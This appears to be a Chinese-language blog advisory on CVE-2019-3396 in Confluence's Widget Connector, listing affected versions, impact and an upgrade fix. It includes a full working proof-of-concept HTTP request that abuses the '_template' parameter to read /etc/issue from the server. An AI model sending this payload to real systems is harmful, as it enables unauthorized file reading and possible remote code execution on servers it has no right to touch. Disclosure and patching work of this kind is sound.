漏洞编号

CVE-2019-3396

漏洞等级

高危

影响范围

1.xx、2.xx、3.xx、4.xx、5.xx、6.0.x、6.1.x、6.2.x、6.3.x、6.4.x、6.5.x、6.6.x < 6.6.12、6.7.x、6.8.x、6.9.x、6.10.x、6.11.x、6.12.x < 6.12.3、6.13.x < 6.13.3、6.14.x < 6.14.2,widgetconnector<=3.1.3

poc:

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: confluence.xxx.com
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://confluence.xxx.com/login.action?os_destination=%2Findex.action&permissionViolation=true
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7,ca;q=0.6
Cookie:xxxxx
Content-Length: 184

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"file:////etc//issue"},"body":""}}

漏洞描述

攻击者可以通过构造恶意的HTTP请求参数,对目标系统实施(路径遍历、任意文件读取以及远程命令执行)攻击。该类攻击可导致目标系统中的敏感信息被泄露,以及执行攻击者构造的恶意代码。

影响范围

所有1.xx,2.xx,3.xx,4.xx和5.xx版本

所有6.0.x,6.1.x,6.2.x,6.3.x,6.4.x和6.5.x版本

6.6.12之前的所有6.6.x版本

所有6.7.x,6.8.x,6.9.x,6.10.x和6.11.x版本

6.12.3之前的所有6.12.x版本

6.13.3之前的所有6.13.x版本

6.14.2之前的所有6.14.x版本

影响后果

敏感信息被泄露,远程代码执行

规避措施

1、升级Confluence版本 2、主动升级widgetconnector-3.1.3.jar 到 widgetconnector-3.1.4.jar

标签: none

添加新评论